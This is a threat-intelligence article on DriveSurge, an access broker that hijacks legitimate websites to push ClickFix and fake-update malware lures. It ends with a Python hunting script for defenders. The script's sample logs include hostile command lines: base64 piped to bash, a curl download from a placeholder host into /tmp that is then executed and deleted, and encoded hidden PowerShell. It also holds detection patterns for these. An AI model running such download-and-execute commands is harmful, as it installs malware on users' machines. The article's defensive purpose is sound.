DriveSurge — A Pay-Per-Install Access Broker Has Hijacked Thousands of Sites for ClickFix and Fake-Update Attacks
Silent Push has named DriveSurge, a pay-per-install access broker that has quietly hijacked thousands of legitimate websites and routes their visitors — on both Windows and macOS — into ClickFix and fake-update malware lures using an off-the-shelf traffic distribution system.
The old advice — don't visit sketchy websites — assumes the danger is the destination. DriveSurge breaks that assumption: it has turned thousands of ordinary, legitimate sites into the delivery channel, and built a business out of selling the infections.
RESTON, Va. — A threat actor that cybersecurity firm Silent Push has named DriveSurge has quietly hijacked thousands of legitimate websites and is using them to push malware to visitors through ClickFix and fake-update lures, according to research Silent Push published on May 30, 2026, reported by BleepingComputer and independently corroborated in part by Rapid7.
What sets DriveSurge apart, Silent Push says, is not a single clever exploit but the shape of the operation: it appears to run as a specialized Initial Access Broker on a Pay-Per-Install model — it gets paid each time a visitor's device is successfully infected, and the resulting access is sold on to other threat actors. The campaign had operated largely undetected, on infrastructure traced back to at least September 2025.
What Happened
Silent Push's Preemptive Cyber Defense team disclosed on May 30, 2026 that it had identified and named DriveSurge, a threat actor it describes as the primary driver behind a large surge in ClickFix and FakeUpdates drive-by campaigns. The firm's central finding is structural: DriveSurge appears to operate as a specialized Initial Access Broker using a Pay-Per-Install model, meaning it is paid each time it successfully infects a visitor's device and then supplies those compromised leads to downstream threat actors. BleepingComputer reported the research, and Silent Push notes that Rapid7 independently flagged part of the same infrastructure, lending the finding cross-vendor weight.
The mechanism is a Traffic Distribution System. DriveSurge injects hidden JavaScript into thousands of legitimate, high-reputation websites — without the owners' or visitors' knowledge — and uses an open-source TDS variant called zTDS, publicly available and in use since at least 2015, to profile each visitor and decide what to serve them. A visitor who lands on a compromised site is silently routed through zTDS and then shown one of two social-engineering lures. The first, FakeUpdates, is a convincing browser-update prompt; Silent Push found the underlying script can impersonate up to eleven browsers, including Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet and UC Browser. The second, ClickFix, is a fake error message that instructs the user to copy a 'fix' and paste it into their terminal or PowerShell window — where it installs malware. To map the operation, Silent Push developed eight technical fingerprints, identified roughly 82 malicious injection domains, and even surfaced seven pre-weaponized domains that had been registered but not yet used to serve injects.
An Access Broker, Not Just Another Malware Crew
The most important word in Silent Push's analysis is 'broker.' DriveSurge is assessed as an Initial Access Broker running a Pay-Per-Install business: it does not necessarily care what ultimately happens on an infected machine, because its product is the infection itself, sold on to whoever is buying. That framing matters for defenders because it explains the scale and the patience. An actor monetizing each install has a direct incentive to compromise as many high-traffic legitimate sites as possible and to keep the operation quiet for as long as possible — which is exactly what happened, with infrastructure traced to at least September 2025 and the campaign running largely undetected until now. It also means the eventual payload is not fixed: today it might be an infostealer, tomorrow a loader for ransomware, depending on which downstream customer bought the access. Treating DriveSurge as 'a malware family' understates it; it is a distribution layer in the criminal supply chain.
The Lure Is Cross-Platform, and macOS Is Squarely in Scope
It would be a mistake to file this as a Windows-and-PowerShell problem. Silent Push's analysis of an obfuscated DriveSurge payload led directly to macOS malware. The script first fingerprints the visitor, filtering specifically for desktop macOS users and excluding iPhones and iPads, so that the lure's instructions stay contextually plausible. macOS victims are shown a fake 'I'm not a robot' reCAPTCHA-style check; clicking it silently hijacks the clipboard, replacing its contents with a malicious command. A modal then tells the user to open Terminal and paste what they believe is a 'verification ID' — but the pasted command is a base64-encoded string piped to bash, which downloads a payload to /tmp, executes it, and deletes the dropper to minimize its forensic footprint. That cross-platform reach puts DriveSurge in the same lineage as the North Korean use of AppleScript and ClickFix on macOS that The CyberSignal has covered, and it is a reminder that paste-into-Terminal social engineering is now a mature macOS attack technique, not a Windows curiosity.
Trusted Websites Are the Delivery Channel Now
DriveSurge is the named-operator anchor for a cluster The CyberSignal has tracked repeatedly: mass-website-compromise as a malware-distribution channel. It sits alongside the Ghost CMS flaw that hijacked 700 sites into a ClickFix campaign, the SymJack fake-installer and AI-chatbot SEO operation, the ACSC warning on ClickFix and the Vidar stealer hitting WordPress sites, and the WordPress plugin takeovers like the actively exploited Kirki flaw that hand attackers the kind of legitimate sites a TDS like zTDS then weaponizes. The through-line is that the historical defender heuristic — avoid suspicious destinations — is operationally inadequate when thousands of ordinary, reputable sites are simultaneously serving attacker payloads to the people who trust them. DriveSurge formalizes that reality into a tracked, commercial category.
Scope and Impact
The exposure is broad by design. Because DriveSurge compromises legitimate, high-reputation websites and routes their normal visitors, the potential victim population is simply 'people browsing the web' — there is no suspicious-link tell, no obviously sketchy domain, because the site genuinely is the local business or professional-services firm the user meant to visit. Silent Push's count of roughly 82 malicious injection domains and seven pre-weaponized ones is a snapshot of infrastructure, not a ceiling on victims; the compromised-site count runs to the thousands. Both Windows and macOS desktop users are in scope, and the fingerprinting logic deliberately excludes mobile so the social-engineering instructions land only where they are plausible.
The defensive scope question is about delivery and execution, not a single patch. There is no one CVE to close here — the entry points are many separately compromised sites, and the harm depends on the visitor actually running the payload. That means the high-leverage controls are the ones that break the chain at delivery (DNS and web-filtering against known DriveSurge and zTDS infrastructure) and at execution (preventing or alerting on user-pasted commands into PowerShell or Terminal). Silent Push has published indicators — injection-domain patterns, the zTDS 'jsrepo' resource pattern that Rapid7 also flagged, and specific payload and C2 addresses — that defenders can operationalize immediately into blocklists and hunts.
Response and Attribution
For SOC and threat-hunting teams, the immediate work is to ingest Silent Push's indicators and sweep the last several months of web-proxy, DNS and EDR telemetry against DriveSurge injection domains and the zTDS 'jsrepo?rnd=' resource pattern that Rapid7 independently noted. Hunt specifically for ClickFix execution: PowerShell or bash invocations triggered shortly after a user paste, with command lines matching common templates — curl piped to a shell, base64-decoded commands, downloads staged into temporary directories. On macOS, watch for the base64-to-bash pattern (a clipboard write immediately followed by a Terminal paste that curls a file into /tmp). Pivot on the published payload and C2 addresses to find any endpoints that already reached attacker infrastructure, and treat a hit as a confirmed infection: under the access-broker model, a second-stage payload may already have been sold and deployed.
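As an added illustration of the hunt described above (example code written for this article, not Silent Push's or Rapid7's tooling), the script below sweeps constructed web-proxy and EDR process records for the zTDS 'jsrepo?rnd=' resource pattern and for the ClickFix command-line templates named in the text. The log formats, hostnames, IPs and the placeholder URL are assumptions; only the 'jsrepo?rnd=' string comes from the published indicators.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (not real DriveSurge indicators): one web-proxy
# line per request, and one EDR record per command executed from a shell.
PROXY_LOG = """\
2026-05-30T10:01:02Z 10.0.0.5 GET https://example-localbiz.test/wp-content/themes/x/jsrepo?rnd=7345 200
2026-05-30T10:01:03Z 10.0.0.5 GET https://example-localbiz.test/images/logo.png 200
2026-05-30T10:01:09Z 10.0.0.7 GET https://cdn.example.test/jquery.min.js 200
"""

PROCESS_LOG = """\
2026-05-30T10:02:11Z host-mac-01 user=jdoe parent=Terminal cmd=echo aGVsbG8= | base64 -d | bash
2026-05-30T10:02:12Z host-win-01 user=asmith parent=powershell.exe cmd=Get-ChildItem C:\\Users
2026-05-30T10:03:40Z host-mac-02 user=rlee parent=Terminal cmd=curl -s http://placeholder.invalid/p -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x && rm /tmp/.x
2026-05-30T10:04:00Z host-win-02 user=bkim parent=powershell.exe cmd=powershell -w hidden -ec SQBFAFgA
"""

# zTDS resource pattern published by Silent Push and also flagged by Rapid7.
ZTDS_RESOURCE = re.compile(r"/jsrepo\?rnd=")

# Command-line templates for the ClickFix execution behaviour the article describes
# (base64 piped to a shell, curl piped to a shell, staging into /tmp, encoded PowerShell).
CLICKFIX_PATTERNS: Dict[str, re.Pattern] = {
    "base64_to_shell": re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh\b"),
    "curl_to_shell": re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"),
    "download_to_tmp_and_run": re.compile(r"\bcurl\b.*-o\s+/tmp/\S+.*&&.*/tmp/\S+"),
    "powershell_encoded": re.compile(r"powershell(\.exe)?\s.*-(e|ec|enc|encodedcommand)\s", re.I),
}


def find_ztds_requests(proxy_log: str) -> List[str]:
    """Return the client IPs that fetched the zTDS 'jsrepo?rnd=' resource."""
    hits = []
    for line in proxy_log.splitlines():
        fields = line.split()  # timestamp, client, method, url, status
        if len(fields) >= 4 and ZTDS_RESOURCE.search(fields[3]):
            hits.append(fields[1])
    return hits


def find_clickfix_executions(process_log: str) -> List[Dict[str, str]]:
    """Return process records whose command line matches a ClickFix template."""
    findings = []
    for line in process_log.splitlines():
        host = line.split()[1]
        cmd = line.split("cmd=", 1)[1]
        for name, pattern in CLICKFIX_PATTERNS.items():
            if pattern.search(cmd):
                findings.append({"host": host, "rule": name, "cmd": cmd})
                break  # one finding per record; first matching rule wins
    return findings
```

A client that appears in both result sets (a zTDS fetch followed by a matching execution on the same endpoint) is the strongest signal and, per the article, should be handled as a confirmed infection rather than a near miss.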
For CISOs and end-user security teams, the durable fix is layered and mostly about delivery and human behavior rather than a single product. Brief users concretely: any website prompt telling you to 'paste this command to fix the issue' or to complete a 'verification' in Terminal or PowerShell is malicious, no matter how legitimate or familiar the site looks — and that warning must explicitly cover Mac users, who are squarely targeted. Restrict PowerShell execution for non-administrative users where feasible, since ClickFix depends on the victim's ability to run pasted commands, and consider equivalent guardrails on managed Macs. Lean on DNS-level filtering and web-content controls to blunt both the compromised-site redirects and the fake-update downloads. The board-level framing is that mass-website compromise is now run by commercial access brokers as a paid service, so 'we only visit reputable sites' is no longer a meaningful control — the reputable sites are the channel.
The CyberSignal Analysis
Signal 01 — The Product Is Access, So the Payload Is a Moving Target
The single most consequential detail is the business model. An Initial Access Broker on a Pay-Per-Install footing is not building toward one objective; it is wholesaling infections to whoever pays. That has two practical implications for defenders. First, the eventual payload on a DriveSurge-infected machine is whatever the downstream buyer wanted — an infostealer this week, a ransomware loader next — so incident responders should not assume the malware they find first is the whole story. Second, the broker's incentives reward breadth and stealth, which is why the operation spread across thousands of sites and ran undetected for months. You defend against an access broker by attacking its economics: break the delivery and execution chain reliably enough that the install rate, and therefore the revenue, collapses.
Signal 02 — Off-the-Shelf Infrastructure Lowers the Bar
DriveSurge's engine, zTDS, is not bespoke — it is an open-source traffic distribution system that has been around since at least 2015 and is publicly available. That matters because it means this capability is not gated behind elite tooling; a TDS, a list of compromised sites, and a couple of lure scripts are enough to run a scaled drive-by operation. The good news, mirrored in Silent Push's method, is that commodity infrastructure also produces commodity fingerprints: reused file-naming patterns, the 'jsrepo' resource string, shared registrars and bulletproof hosts, and dedicated registration emails all give defenders durable trackable signatures. The same off-the-shelf nature that lowers the attacker's bar also gives the defender repeatable detection — which is exactly why cross-vendor corroboration from Rapid7 was possible.
Signal 03 — Paste-Into-Terminal Is a Cross-Platform Human Exploit
ClickFix works because it converts a security ritual into an attack: the user thinks they are passing a check or applying a fix, and instead they run the attacker's command with their own hands. DriveSurge shows this is no longer Windows-specific — the macOS variant dresses the same trick up as a reCAPTCHA and a clipboard hijack. There is no patch for a user voluntarily pasting a command into a shell, which is why the most effective controls are a mix of removing the capability (restricting PowerShell and shell access for users who do not need it), interrupting the delivery (DNS and content filtering), and training that names the specific pattern. The mental model defenders should instill is blunt: legitimate websites and CAPTCHAs never ask you to open a terminal.